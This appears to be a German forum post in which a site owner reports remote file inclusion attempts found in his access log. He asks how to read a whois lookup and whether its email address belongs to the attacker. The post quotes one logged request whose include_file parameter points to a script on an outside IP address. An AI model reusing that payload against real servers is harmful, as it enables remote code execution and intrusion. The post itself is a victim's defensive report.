Hi,

hab grade in meinen access.log einen Hacker ausfindig gemacht, dieses mal auf meiner geliebten nimmet Domain.

Hab dutzende abfragen in Form von

/lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???

Die IPs sind

216.252.87.12 - libwww-perl/5.79
64.22.125.219 - libwww-perl/5.805
und einige mehr..

Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)

Was sagt überhaupt diese Whois abfrage aus, ich versteh das nicht so ganz.
Ist die dort angegebene E-Mail adresse die des hackers?

Seine Seite ist auch über die IP abrufbar, http://64.22.125.219/, nur hat der Vogel kein Impressum,
den sollte man so einen Abmahn-wütigen Anwalt auf den Hals hetzen. *g

Warum finden diese idioten immer mich?

Grüße aus H im R,
Engin

--
"ich bin ein Insekt, ich bin ein Insekt"
Der Valligator
"I would like to buy a hamburger"